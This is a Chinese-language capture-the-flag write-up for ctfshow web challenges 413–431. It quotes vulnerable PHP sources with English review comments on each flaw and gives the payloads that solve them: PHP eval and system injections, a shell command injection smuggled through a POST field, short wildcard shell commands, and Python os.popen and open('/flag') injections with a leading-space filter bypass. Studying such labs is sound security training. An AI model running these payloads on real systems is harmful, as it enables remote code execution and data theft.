ctfshow 其他 web入门 web413--web431

发布于:2024-05-22 ⋅ 阅读:(207) ⋅ 点赞:(0)

web413

ctfshow=*/system('cat flag.php');/*

记得查看源码,或者用bp,我反正是愣了一会儿

web414

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-25 23:07:21
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-26 16:43:53
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// Challenge source as quoted by the write-up; comments added for review.
// Prints this file's own source on every request.
highlight_file(__FILE__);
// $flag is read below but never assigned in this file, so it presumably comes
// from flag.php — confirm against that file.
include('flag.php');
// Untrusted request value, used below without type or range validation.
$ctfshow=$_GET['ctfshow'];

// Loose truthiness check: any non-empty, non-"0" string passes, including
// negative numeric strings.
if($ctfshow==true){
    // Fail-open comparison: sqrt() of a negative number is NAN, and every
    // ordered comparison involving NAN evaluates to false, so such input
    // skips the "deny" branch and lands in the else that prints the flag.
    // A sound check validates the input first (reject anything that is not
    // a non-negative number) and denies by default.
    if(sqrt($ctfshow)>=sqrt(intval($flag))){
        echo 'FLAG_NOT_HERE';
    }else{
        echo $flag;
    }
} 

利用 sqrt() 的特性:对负数求平方根得到 NAN,而 NAN 参与的大小比较结果恒为 false,于是判断落入 else 分支

?ctfshow=-1

web415

大写绕过:PHP 的函数名不区分大小写,而 == 的字符串比较区分大小写

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-25 23:07:21
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-26 19:15:52
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
// Silences all diagnostics, including the one raised by the bare constant below.
error_reporting(0);
highlight_file(__FILE__);

// NOTE(review): bare `k` is an undefined constant, not the string 'k'.
// PHP 7 falls back to the string 'k' with a diagnostic; PHP 8 throws an Error.
// The intended form is $_GET['k'].
$k = $_GET[k];

// Prints the contents of flag.php.
function getflag(){
    echo file_get_contents('flag.php');
}

// Denylist of a single exact spelling. This comparison is case-sensitive,
// while PHP resolves function names case-insensitively, so the check and the
// call below disagree about which inputs mean "getflag".
if($k=='getflag'){
    die('FLAG_NOT_HERE');
}else{
    // Request-controlled callable: whatever name the client sends is invoked.
    // Safer design: look the input up in a fixed allowlist of permitted
    // handlers instead of denylisting names.
    call_user_func($k);
}
?k=getFlag

web416

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-25 23:07:21
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-26 19:54:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
// Silences all diagnostics for the rest of the script.
error_reporting(0);
highlight_file(__FILE__);

class ctf{
    // Decoy method: returns a fixed placeholder string.
    public function getflag(){
        return 'fake flag';
    }
    // `final` only prevents subclasses from overriding this method; it does
    // not restrict who may call it. The method is public and prints flag.php.
    final public function flag(){
        echo file_get_contents('flag.php');
    }
}

class show extends ctf{
    // Passes its argument straight to call_user_func(), which accepts
    // 'Class::method' strings as well as plain function names, so the caller
    // of the constructor decides what gets executed.
    public function __construct($f){
        call_user_func($f);
    }
}

// The constructor argument comes directly from the query string, with no
// allowlist of permitted callables.
// NOTE(review): bare `f` is an undefined constant (string fallback on PHP 7,
// Error on PHP 8); the intended form is $_GET['f'].
// Neither class defines __toString(), so the echo itself cannot succeed, but
// the constructor has already run by then.
echo new show($_GET[f]); 

调用函数:call_user_func 接受 '类名::方法名' 形式的字符串,可以直接调用 ctf 类里的 flag 方法

?f=ctf::flag

web417

将文件处理了

// $flag is read below but never assigned here, so it presumably comes from
// flag.php — confirm against that file.
include('flag.php');
// Untrusted query-string value.
$c=$_GET['ctf'];
// The flag is released to any request whose ctf parameter equals 'show'.
// The expected value is a fixed string in the source, so it offers no
// protection once the source can be read; it is not an authentication check.
if($c=='show'){
	echo $flag;
}else{
	echo 'FLAG_NOT_HERE';
}
?>
?ctf=show

web418

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-25 23:07:21
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-26 23:52:58
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
// Defaults the logic below depends on; both can be replaced by extract().
$key= 0;
$clear='clear.php';
highlight_file(__FILE__);

// Read the request parameter
$ctfshow=$_GET['ctfshow'];
// Include the cleanup script ($clear still holds 'clear.php' at this point,
// because extract() has not run yet)
include($clear);


// extract() on request data lets the client create or overwrite any variable
// in this scope, here including $key, $clear and $die. Read the specific
// fields that are needed instead of extracting the whole POST body.
extract($_POST);
// Strict comparison with the integer 0x36d: values extracted from $_POST are
// strings or arrays, so they are never identical to an int.
if($key===0x36d){
    // Backdoor pre-written for the attacker (original author's comment)
    eval('<?php '.$ctfshow.'?>');
}else{
    // Both $die and $clear are client-controlled after extract(); a falsy
    // $die passes the client's $clear into clear().
    $die?die('FLAG_NOT_HERE'):clear($clear);
}
// Removes $log by concatenating it into a shell command line. $log is not
// escaped, so shell metacharacters in it are interpreted by the shell
// (command injection). Safer: unlink() on a fixed path, or at minimum
// escapeshellarg() on the argument.
function clear($log){
    shell_exec('rm -rf '.$log);
} 

后门用不了:extract($_POST) 得到的 $key 只能是字符串或数组,无法与整数 0x36d 全等,所以我们改走 else 分支里 clear() 的命令执行

POST:
die=0&clear=;cp flag.php 1.txt

web419

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-25 23:07:21
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-29 01:36:24
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


// Prints this file's own source on every request.
highlight_file(__FILE__);
// Untrusted POST field.
$code = $_POST['code'];
// The only guard is a length cap of 16 bytes. Length does not limit what the
// evaluated code can do, because short code can still read other request
// data, so this is remote code execution. eval() on request input should be
// removed rather than size-limited.
if(strlen($code) < 17){
    eval($code);
} 

我只能说17个字符很长

code=eval($_POST[1]);&1=system('cat flag.php');

web420

<?php
// Prints this file's own source on every request.
highlight_file(__FILE__);


// Untrusted value, read from the POST body.
$code = $_POST['code'];
// A cap of 7 bytes is the only restriction before the string goes to the
// shell. Shell globbing and short utility names fit well inside that budget,
// so the cap is not a security control. Request input should never reach
// system(); use a fixed command or an allowlist of operations.
if(strlen($code) < 8){
    system($code);
} 
?code=ls
?code=nl ../*

8个字符就有点意思了

web421

<?php
// Prints this file's own source on every request.
highlight_file(__FILE__);


// Untrusted value, read from the POST body.
$code = $_POST['code'];
// Same pattern with the cap lowered to 5 bytes: the input is still passed
// verbatim to the shell, and wildcard expansion keeps useful commands within
// the limit. Shrinking the budget does not remove the command injection.
if(strlen($code) < 6){
    system($code);
} 
code=nl f*

web422

<?php
// Prints this file's own source on every request.
highlight_file(__FILE__);


// Untrusted value, read from the POST body.
$code = $_POST['code'];
// Cap lowered to 4 bytes, still with no validation of the content. Any
// non-zero budget leaves the shell reachable from request input; the fix is
// to stop passing request data to system() at all.
if(strlen($code) < 5){
    system($code);
} 
code=nl *

web423

这里扫后台也是什么都没有扫到,只能尝试 Python 的语法命令,结果成功了

?code=os.popen('ls /').read()
?code=open('/flag').read()

web424

?code=open('/flag').read()

web425–web428

?code=open('/flag').read()
直接打爽了

web429–web431

过滤了 open,但是只会检查字符串的开头,我们在前面加个空格就绕过了

?code= open('/flag').read()
